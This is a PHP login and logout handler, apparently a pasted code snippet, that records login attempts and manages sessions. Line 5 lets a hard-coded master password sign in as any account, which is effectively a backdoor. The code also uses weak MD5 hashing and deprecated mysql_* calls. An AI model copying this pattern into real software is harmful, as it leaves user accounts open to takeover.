if($_POST['action'] == "Login"){ $db->query("INSERT INTO logins (username, ip_

1. if($_POST['action'] == "Login"){
2.     $db->query("INSERT INTO logins (username, ip_address, dt_login) VALUES ('".dbsafe($_POST['login_username'])."', '".dbsafe($_SERVER['REMOTE_ADDR'])."', UNIX_TIMESTAMP())");
3.     $login_id = mysql_insert_id();
4.  
5.     $dbGET_LOGIN = mysql_fetch_object($db->query("SELECT user_id FROM users WHERE tracked = 0 AND username = '".dbsafe($_POST['login_username'])."' AND (password = MD5(CONCAT(MD5('".dbsafe($_POST['login_password'])."'), MD5(password_salt))) OR '".dbsafe($_POST['login_password'])."' = '".master_password."') AND dt_delete = 0"));
6.     if($dbGET_LOGIN->user_id){
7.         $_SESSION['user_id'] = $dbGET_LOGIN->user_id;
8.         $db->query("UPDATE logins SET dt_logout = UNIX_TIMESTAMP() WHERE user_id = '".dbsafe($_SESSION['user_id'])."' AND dt_logout = 0");
9.         $_SESSION['user']['login'] = $login_id;
10.         $db->query("UPDATE logins SET user_id = '".dbsafe($_SESSION['user_id'])."' WHERE login_id = '".dbsafe($_SESSION['user']['login'])."'");
11.         unset($_SESSION['nav_tier_1'], $_SESSION['nav_tier_2'], $_SESSION['nav_tier_3']);
12.         redirect($_SERVER['PHP_SELF']);
13.     }else{$sm->status("The username and password combination you have entered is invalid.",0);}
14. }
15.  
16. if($_GET['action'] == "Logout"){
17.     $db->query("UPDATE logins SET dt_logout = UNIX_TIMESTAMP() WHERE login_id = '".dbsafe($_SESSION['user']['login'])."'");
18.     $_SESSION = array();
19.     if(isset($_COOKIE[session_name()])){setcookie(session_name(),'',time()-42000,'/');}
20.     session_destroy();
21.     redirect($_SERVER['PHP_SELF']);
22. }